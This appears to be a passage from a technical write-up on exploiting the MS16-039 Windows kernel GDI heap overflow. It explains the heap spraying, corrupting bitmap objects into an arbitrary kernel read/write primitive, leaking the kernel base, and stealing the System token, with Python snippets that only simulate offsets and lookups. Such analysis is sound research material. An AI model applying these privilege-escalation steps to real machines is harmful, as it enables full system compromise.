This picture shows the content of the GDI object, before and after the heap overflow:

ms16_039-heap-overflow

The final result is that the «cx» property of the «SURFOBJ64.sizlBitmap» SIZE struct is set to the value 0xFFFFFFFF.
It means that the GDI object now has width=0xFFFFFFFF and height=0x01.

So, we are able to read/write contiguous memory far beyond the original limits set for «SURFOBJ64.pvScan0»!
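
To get a feeling for the new reach, the Python sketch below computes how many bytes a bitmap of a given size covers. The 32 bits per pixel and the original width of 0x52 are assumptions chosen for illustration; they are not values taken from the exploit.

```python
def bitmap_bytes(width, height, bits_per_pixel):
    """Bytes covered by a bitmap, ignoring any scanline padding."""
    return width * height * bits_per_pixel // 8

before = bitmap_bytes(0x52, 1, 32)          # hypothetical original width
after = bitmap_bytes(0xFFFFFFFF, 1, 32)     # cx after the overflow
print(before, hex(after))
```

Under these assumptions the accessible range grows from a few hundred bytes to several gigabytes past «pvScan0».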

Another interesting thing to know is that, when GDI objects are smaller than 4KB, the DATA pointed to by «SURFOBJ64.pvScan0» is contiguous to the object properties.

With all these things, it was time to write an exploit …

Exploitation — Step 1

In the exploit I wrote, I used 0x55555557 POINT structs, which is one more point than what I gave as an example.

So, the new calculation is:

0x55555557 x 3 = 0x1'0000'0005

As the result is truncated to a 32 bit number, we get 0x5, and then this number is multiplied by 16:

0x5 << 4 = 0x50

It means that «PALLOCMEM2» function will allocate 0x50 bytes when the vulnerable function calls it.

The reason why I decided to increase the size by 0x30 bytes is that very small chunk allocations are not always predictable.

Adding the chunk header size (0x10 bytes), the heap spray should look like this:

ms16_039-heap-spray-candidate

Looking at the previous picture, only one FREE chunk will be used by the vulnerable function.
When this happens, there will be a GDI object next to this one.

Because of alignment problems between the small chunk used and the «SURFOBJ64.sizlBitmap.cx» property, it was necessary to use an extra PADDING chunk.
It means that three different memory chunks were used to make this heap feng shui.

Hitting a breakpoint after the memory allocation, we can see how the heap spray worked and what position, inside the 4KB memory page, was used by the vulnerable function.

ms16-039-heap-spray

Making some calculations, we can see that if we add «0x60 + 0xbf0» bytes to the allocated chunk, we get the first GDI object (Gh15) next to it.
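
The offsets can be checked with a few lines of Python. This sketch assumes the vulnerable chunk is the last chunk of its 4KB page and that the 0xbf0-byte padding chunk opens the following page; the sizes come from the text, the layout itself is an inference.

```python
PAGE_SIZE = 0x1000
POOL_HEADER = 0x10               # chunk header size given in the text
VULN_CHUNK = 0x50 + POOL_HEADER  # 0x60 bytes including the header
PADDING_CHUNK = 0xBF0            # padding chunk size given in the text

def layout():
    """Offsets of the vulnerable chunk and of the GDI object it reaches."""
    vuln_offset = PAGE_SIZE - VULN_CHUNK           # last chunk in page N
    gdi_address = vuln_offset + VULN_CHUNK + PADDING_CHUNK
    return vuln_offset, gdi_address - PAGE_SIZE    # GDI offset inside page N+1

vuln_offset, gdi_offset = layout()
print(hex(vuln_offset), hex(gdi_offset))  # 0xfa0 0xbf0
```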

Exploitation — Step 1.5

Once a GDI object has been overwritten by the heap overflow, it’s necessary to know which one it is.

As the heap spray uses a large number of GDI objects, 4096 in my case, the next step is to go through the GDI object array and detect which one has been modified by calling «GetBitmapBits».
When this function is able to read beyond the original object limits, it means that the overwritten GDI object has been found.

Looking at the function prototype:

HBITMAP CreateBitmap(
 _In_ int nWidth,
 _In_ int nHeight,
 _In_ UINT cPlanes,
 _In_ UINT cBitsPerPel,
 _In_ const VOID *lpvBits
 );

As an example, we could create a GDI object like this:

CreateBitmap (100, 100, 1, 32, lpvBits);

Once the object has been created, if we call «GetBitmapBits» with a size bigger than 100 x 100 x 4 bytes (32 bits) it will fail, except if this object has been overwritten afterwards.

So, the way to detect which GDI object has been modified is to check when its behavior is different than expected.
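
The detection loop can be sketched in Python with a stand-in for the real objects. «FakeBitmap» and «find_corrupted» are hypothetical names, and the model only reproduces the behaviour described above (an oversized read fails unless the size field was overwritten); it does not call any GDI function.

```python
class FakeBitmap:
    """Stand-in for a GDI bitmap; only the size check is modelled."""
    def __init__(self, width, height, bpp=32):
        self.limit = width * height * bpp // 8

    def get_bits(self, size):
        # As described above: an oversized read fails (modelled as 0).
        return size if size <= self.limit else 0

def find_corrupted(bitmaps, original_size):
    """Return the index of the first bitmap that accepts an oversized read."""
    for index, bitmap in enumerate(bitmaps):
        if bitmap.get_bits(original_size + 1) != 0:
            return index
    return None

spray = [FakeBitmap(100, 100) for _ in range(4096)]
spray[1234].limit = 0xFFFFFFFF * 4   # simulate the overwritten sizlBitmap.cx
print(find_corrupted(spray, 100 * 100 * 4))  # 1234
```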

Exploitation — Step 2

Now that we can read/write beyond the GDI object limits, we can use this new skill to overwrite a second GDI object and thus get an arbitrary write.

Looking at our heap spray, we can see that there is a second GDI object located 0x1000 bytes after the first one.

ms16-039-gdi-secuence

So, if we are able to write the contiguous memory we want from the first GDI object, we can modify the «SURFOBJ64.pvScan0» property of the second one.

Then, if we use the second GDI object by calling «GetBitmapBits/SetBitmapBits», we are able to read/write where we want to because we control exactly which address will be used.

Thus, if we repeat the above steps, we are able to read/write ‘n’ times any kernel memory address from USER SPACE, and at the same time, we will avoid running ring-0 shellcode in kernel space.

It’s important to say that before overwriting the «SURFOBJ64.pvScan0» property of the second GDI object, we have to read all DATA between both GDI objects, and then overwrite the same data up to the property we want to modify.
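
This read-then-rewrite step can be sketched in Python against a simulated buffer. In the real exploit the two callbacks would wrap «GetBitmapBits» and «SetBitmapBits» on the first GDI object; here they operate on a «bytearray», and the offset and target address are made-up values for illustration.

```python
import struct

def patch_pvscan0(read_gap, write_gap, gap_size, pvscan0_offset, target):
    """Read gap_size bytes, replace one 64-bit pointer, write everything back."""
    data = bytearray(read_gap(gap_size))
    struct.pack_into("<Q", data, pvscan0_offset, target)
    write_gap(bytes(data))

# Simulated memory following the first bitmap's pixel data.
memory = bytearray(range(256)) * 16          # 0x1000 bytes of recognisable data
snapshot = bytes(memory)

patch_pvscan0(
    read_gap=lambda n: bytes(memory[:n]),
    write_gap=lambda buf: memory.__setitem__(slice(0, len(buf)), buf),
    gap_size=0x1000,
    pvscan0_offset=0xF50,                    # hypothetical offset, not from the text
    target=0xFFFF800012345678,               # hypothetical address to read or write
)
```

Everything except the eight patched bytes is written back unchanged, which is the point of reading the gap first.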

On the other hand, it’s pretty simple to detect which is the second GDI object, because when we read DATA between both objects, we are getting a lot of information, including its HANDLE.

Summing up, we use the heap overflow to overwrite a GDI object, and from this object to overwrite a second GDI object next to it.

Exploitation — Final Stage

Once we get a kernel read/write primitive, we could say that the last step is pretty simple.

The idea is to steal the «System» process token and set it to our process (exploit.exe).

As this attack is launched from «Low Integrity Level», it’s not possible to get TOKEN addresses by calling «NtQuerySystemInformation» («SystemInformationClass = SystemModuleInformation»), so we have to take the long way.

The EPROCESS list is a linked list, where every element is an EPROCESS struct that contains information about a unique running process, including its TOKEN.

This list is pointed to by the «PsInitialSystemProcess» symbol, located in «ntoskrnl.exe».
So, if we get the Windows kernel base, we can get the «PsInitialSystemProcess» kernel address, and then perform the famous TOKEN KIDNAPPING.

The best way I know of leaking a Windows kernel address is by using the «sidt» user-mode instruction.
This instruction returns the size and address of the operating system’s interrupt descriptor table (IDT), located in kernel space.

Every single entry contains a pointer to its interrupt handler located in «ntoskrnl.exe».
So, if we use the primitive we got previously, we are able to read these entries and get one «ntoskrnl.exe» interrupt handler address.
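
For reference, the handler address is split across three fields of each 16-byte x64 IDT gate. The Python sketch below reassembles it from raw bytes; in the exploit those bytes would come from the read primitive, while here the sample entry is built by hand with a made-up handler address.

```python
import struct

def idt_handler(entry):
    """Rebuild the 64-bit handler address from one 16-byte x64 IDT gate."""
    low, _selector, _ist, _attr, mid, high, _reserved = struct.unpack(
        "<HHBBHII", entry
    )
    return (high << 32) | (mid << 16) | low

# Hand-built gate for a hypothetical handler at 0xFFFFF80312345678.
sample = struct.pack("<HHBBHII", 0x5678, 0x10, 0, 0x8E, 0x1234, 0xFFFFF803, 0)
print(hex(idt_handler(sample)))  # 0xfffff80312345678
```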

The next step is to read backwards through «ntoskrnl.exe» memory until we find the well-known «MZ» signature, which marks the base address of «ntoskrnl.exe».
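
A minimal sketch of that backwards scan, in Python, is shown below. It assumes the image base is page aligned and that every page between the handler and the base is readable; «find_image_base» and the fake read function are hypothetical, standing in for the kernel read primitive.

```python
PAGE_SIZE = 0x1000

def find_image_base(read, address, max_pages=0x4000):
    """Walk down page by page from address until a page starts with b'MZ'."""
    page = address & ~(PAGE_SIZE - 1)
    for _ in range(max_pages):
        if read(page, 2) == b"MZ":
            return page
        page -= PAGE_SIZE
    return None

# Simulated kernel image: "MZ" at the base, zeros elsewhere.
FAKE_BASE = 0xFFFFF80000200000   # hypothetical load address

def fake_read(address, size):
    return b"MZ"[:size] if address == FAKE_BASE else b"\x00" * size

print(hex(find_image_base(fake_read, FAKE_BASE + 0x123456)))
```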

Once we get the Windows kernel base, we only need to know what the «PsInitialSystemProcess» kernel address is.
Fortunately, from USER SPACE it’s possible to use the «LoadLibrary» function to load «ntoskrnl.exe» and then use «GetProcAddress» to get the «PsInitialSystemProcess» relative offset.
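
The translation from the user-mode copy to the running kernel is a simple rebase, sketched below in Python. All three addresses are invented for illustration, and «kernel_symbol_address» is a hypothetical helper.

```python
def kernel_symbol_address(kernel_base, user_base, user_symbol):
    """Translate an address from the user-mode copy to the running kernel."""
    return kernel_base + (user_symbol - user_base)

# All three values below are hypothetical, for illustration only.
user_base = 0x00007FF6_12340000      # where LoadLibrary mapped ntoskrnl.exe
user_symbol = user_base + 0x3A5B20   # what GetProcAddress returned
kernel_base = 0xFFFFF803_1A200000    # base found by scanning for "MZ"
print(hex(kernel_symbol_address(kernel_base, user_base, user_symbol)))
```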

As a result of what I explained before, I obtained this:

ms16-039-exploitation

Final notes

It’s important to say that it wasn’t necessary to use the GDI objects memory leak explained by the «Abusing GDI for ring0 exploit primitives» blogpost.

However, it’s interesting to see how «Windows 10» 64 bits can be exploited from «Low Integrity Level» through kernel vulnerabilities, despite all the kernel exploit mitigations implemented so far.